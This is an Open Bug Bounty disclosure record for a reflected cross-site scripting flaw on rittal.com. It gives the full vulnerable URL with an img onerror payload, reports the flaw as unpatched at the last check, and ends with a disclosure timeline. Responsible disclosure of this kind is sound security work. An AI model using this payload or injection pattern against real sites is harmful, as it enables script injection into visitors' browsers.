rittal.com XSS vulnerability

2017-08-23T23:11:00
ID OBB:281726
Type openbugbounty
Reporter eb
Modified 2017-11-21T23:22:00

Description

Vulnerable URL:
https://www.rittal.com/de-de/content/de/unternehmen/produktionssttten/company_overlay.jsp?name=%22%3Etrolo%3Ci%3Etralala%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E&assetid;=4_8464&adress;=%3CCMS_VALUE+name%3D%22cs_address%22+tag%3D%22CMS_INPUT_DOM%22%3E%3CLANG+id%3D%22%C2%A7%22+set%3D%221%22%3E%3CDOM%3E%3Caddress%3EDieselstra%C3%9Fe+32%3C%2Faddress%3E%3Caddress%3ED-85748+Garching%3C%2Faddress%3E%3C%2FDOM%3E%3C%2FLANG%3E%3C%2FCMS_VALUE%3E☎=%2B49%20(0)%2089%20326753-0&fax;=&email;=&url;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 21.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 70750
VIP website status:| No
Check rittal.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 August, 2017 23:11 GMT
Generic security notifications sent to website owner| 23 August, 2017 23:14 GMT
Notification sent to subscribers (without technical details)| 24 August, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 21 November, 2017 23:22 GMT